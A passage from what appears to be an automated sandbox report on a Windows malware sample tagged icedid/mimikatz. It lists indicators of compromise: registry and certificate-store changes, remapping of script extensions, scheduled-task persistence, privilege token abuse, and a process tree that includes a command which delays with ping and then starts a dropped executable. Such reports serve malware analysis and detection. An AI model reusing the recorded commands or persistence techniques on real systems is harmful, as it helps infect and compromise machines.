opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2900 PING.EXE 2752 cmd.exe -
NSIS installer 3 IoCs
resource yara_rule behavioral1/files/0x0009000000015d5f-5.dat nsis_installer_2 behavioral1/files/0x0009000000015e4e-15.dat nsis_installer_1 behavioral1/files/0x0009000000015e4e-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad wufiyti.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" yzbibbali.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzbibbali.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wufiyti.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs wufiyti.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust wufiyti.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs wufiyti.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4C3FF418-ACF9-4D11-B32C-198C44705BF7}\46-bd-69-fe-4b-53 wufiyti.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzbibbali.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4C3FF418-ACF9-4D11-B32C-198C44705BF7} wufiyti.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" yzbibbali.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4C3FF418-ACF9-4D11-B32C-198C44705BF7}\WpadDecisionTime = f05f6bd8cb13db01 wufiyti.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" wufiyti.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4C3FF418-ACF9-4D11-B32C-198C44705BF7}\WpadDecision = "0" wufiyti.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs wufiyti.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wufiyti.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs wufiyti.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates wufiyti.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs wufiyti.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\46-bd-69-fe-4b-53\WpadDecisionReason = "1" wufiyti.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzbibbali.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates wufiyti.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections wufiyti.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix wufiyti.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals yzbibbali.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates wufiyti.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wufiyti.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" yzbibbali.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates wufiyti.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs wufiyti.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 wufiyti.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" yzbibbali.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople wufiyti.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4C3FF418-ACF9-4D11-B32C-198C44705BF7}\WpadNetworkName = "Network 3" wufiyti.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed wufiyti.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzbibbali.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My wufiyti.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates wufiyti.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00b4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 wufiyti.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" yzbibbali.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" yzbibbali.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates wufiyti.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4C3FF418-ACF9-4D11-B32C-198C44705BF7}\WpadDecisionReason = "1" wufiyti.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\46-bd-69-fe-4b-53\WpadDetectedUrl wufiyti.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs wufiyti.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates wufiyti.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" wufiyti.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" wufiyti.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 wufiyti.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 wufiyti.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2900 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2608 schtasks.exe 2900 schtasks.exe 2668 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
pid Process 1532 wufiyti.exe 1844 wufiyti.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe -
Suspicious behavior: LoadsDriver 31 IoCs
pid Process 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2892 2024-10-01_833584844ffcd5b87c2d2e05a6123b10_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2892 2024-10-01_833584844ffcd5b87c2d2e05a6123b10_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 1808 wufiyti.exe Token: SeDebugPrivilege 2648 wufiyti.exe Token: SeDebugPrivilege 2708 vfshost.exe Token: SeAuditPrivilege 2188 svchost.exe Token: SeDebugPrivilege 992 yzbibbali.exe Token: SeShutdownPrivilege 992 yzbibbali.exe Token: SeLockMemoryPrivilege 1792 vcgilh.exe Token: SeLockMemoryPrivilege 1792 vcgilh.exe Token: SeDebugPrivilege 2632 yzbibbali.exe Token: SeShutdownPrivilege 2632 yzbibbali.exe Token: SeDebugPrivilege 2856 yzbibbali.exe Token: SeShutdownPrivilege 2856 yzbibbali.exe Token: SeDebugPrivilege 584 yzbibbali.exe Token: SeShutdownPrivilege 584 yzbibbali.exe Token: SeDebugPrivilege 2236 yzbibbali.exe Token: SeShutdownPrivilege 2236 yzbibbali.exe Token: SeDebugPrivilege 2924 yzbibbali.exe Token: SeShutdownPrivilege 2924 yzbibbali.exe Token: SeDebugPrivilege 1148 yzbibbali.exe Token: SeShutdownPrivilege 1148 yzbibbali.exe Token: SeDebugPrivilege 1276 yzbibbali.exe Token: SeShutdownPrivilege 1276 yzbibbali.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2892 2024-10-01_833584844ffcd5b87c2d2e05a6123b10_hacktools_icedid_mimikatz.exe 2892 2024-10-01_833584844ffcd5b87c2d2e05a6123b10_hacktools_icedid_mimikatz.exe 1808 wufiyti.exe 1808 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 600 xohudmc.exe 2408 dqljao.exe 1532 wufiyti.exe 1532 wufiyti.exe 1844 wufiyti.exe 1844 wufiyti.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2892 wrote to memory of 2752 2892 2024-10-01_833584844ffcd5b87c2d2e05a6123b10_hacktools_icedid_mimikatz.exe 30 PID 2892 wrote to memory of 2752 2892 2024-10-01_833584844ffcd5b87c2d2e05a6123b10_hacktools_icedid_mimikatz.exe 30 PID 2892 wrote to memory of 2752 2892 2024-10-01_833584844ffcd5b87c2d2e05a6123b10_hacktools_icedid_mimikatz.exe 30 PID 2892 wrote to memory of 2752 2892 2024-10-01_833584844ffcd5b87c2d2e05a6123b10_hacktools_icedid_mimikatz.exe 30 PID 2752 wrote to memory of 2900 2752 cmd.exe 32 PID 2752 wrote to memory of 2900 2752 cmd.exe 32 PID 2752 wrote to memory of 2900 2752 cmd.exe 32 PID 2752 wrote to memory of 2900 2752 cmd.exe 32 PID 2752 wrote to memory of 1808 2752 cmd.exe 33 PID 2752 wrote to memory of 1808 2752 cmd.exe 33 PID 2752 wrote to memory of 1808 2752 cmd.exe 33 PID 2752 wrote to memory of 1808 2752 cmd.exe 33 PID 2648 wrote to memory of 2620 2648 wufiyti.exe 35 PID 2648 wrote to memory of 2620 2648 wufiyti.exe 35 PID 2648 wrote to memory of 2620 2648 wufiyti.exe 35 PID 2648 wrote to memory of 2620 2648 wufiyti.exe 35 PID 2620 wrote to memory of 2264 2620 cmd.exe 37 PID 2620 wrote to memory of 2264 2620 cmd.exe 37 PID 2620 wrote to memory of 2264 2620 cmd.exe 37 PID 2620 wrote to memory of 2264 2620 cmd.exe 37 PID 2620 wrote to memory of 2272 2620 cmd.exe 38 PID 2620 wrote to memory of 2272 2620 cmd.exe 38 PID 2620 wrote to memory of 2272 2620 cmd.exe 38 PID 2620 wrote to memory of 2272 2620 cmd.exe 38 PID 2620 wrote to memory of 2076 2620 cmd.exe 39 PID 2620 wrote to memory of 2076 2620 cmd.exe 39 PID 2620 wrote to memory of 2076 2620 cmd.exe 39 PID 2620 wrote to memory of 2076 2620 cmd.exe 39 PID 2620 wrote to memory of 2644 2620 cmd.exe 40 PID 2620 wrote to memory of 2644 2620 cmd.exe 40 PID 2620 wrote to memory of 2644 2620 cmd.exe 40 PID 2620 wrote to memory of 2644 2620 cmd.exe 40 PID 2620 wrote to memory of 380 2620 cmd.exe 41 PID 2620 wrote to memory of 380 2620 cmd.exe 41 PID 2620 wrote to memory of 380 2620 cmd.exe 41 PID 2620 wrote to memory of 380 2620 cmd.exe 41 PID 2620 wrote to memory of 780 2620 cmd.exe 42 PID 2620 wrote to memory of 780 2620 cmd.exe 42 PID 2620 wrote to memory of 780 2620 cmd.exe 42 PID 2620 wrote to memory of 780 2620 cmd.exe 42 PID 2648 wrote to memory of 2700 2648 wufiyti.exe 44 PID 2648 wrote to memory of 2700 2648 wufiyti.exe 44 PID 2648 wrote to memory of 2700 2648 wufiyti.exe 44 PID 2648 wrote to memory of 2700 2648 wufiyti.exe 44 PID 2648 wrote to memory of 2936 2648 wufiyti.exe 46 PID 2648 wrote to memory of 2936 2648 wufiyti.exe 46 PID 2648 wrote to memory of 2936 2648 wufiyti.exe 46 PID 2648 wrote to memory of 2936 2648 wufiyti.exe 46 PID 2648 wrote to memory of 2824 2648 wufiyti.exe 48 PID 2648 wrote to memory of 2824 2648 wufiyti.exe 48 PID 2648 wrote to memory of 2824 2648 wufiyti.exe 48 PID 2648 wrote to memory of 2824 2648 wufiyti.exe 48 PID 2648 wrote to memory of 2232 2648 wufiyti.exe 50 PID 2648 wrote to memory of 2232 2648 wufiyti.exe 50 PID 2648 wrote to memory of 2232 2648 wufiyti.exe 50 PID 2648 wrote to memory of 2232 2648 wufiyti.exe 50 PID 2232 wrote to memory of 2132 2232 cmd.exe 52 PID 2232 wrote to memory of 2132 2232 cmd.exe 52 PID 2232 wrote to memory of 2132 2232 cmd.exe 52 PID 2232 wrote to memory of 2132 2232 cmd.exe 52 PID 2232 wrote to memory of 2132 2232 cmd.exe 52 PID 2232 wrote to memory of 2132 2232 cmd.exe 52 PID 2232 wrote to memory of 2132 2232 cmd.exe 52 PID 2132 wrote to memory of 112 2132 wpcap.exe 53
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:492
-
C:\Windows\TEMP\slttcgmkz\vcgilh.exe"C:\Windows\TEMP\slttcgmkz\vcgilh.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-01_833584844ffcd5b87c2d2e05a6123b10_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-01_833584844ffcd5b87c2d2e05a6123b10_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\fbleugiz\wufiyti.exe2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2900
-
-
C:\Windows\fbleugiz\wufiyti.exeC:\Windows\fbleugiz\wufiyti.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1808
-
-
-
C:\Windows\fbleugiz\wufiyti.exeC:\Windows\fbleugiz\wufiyti.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2648 -
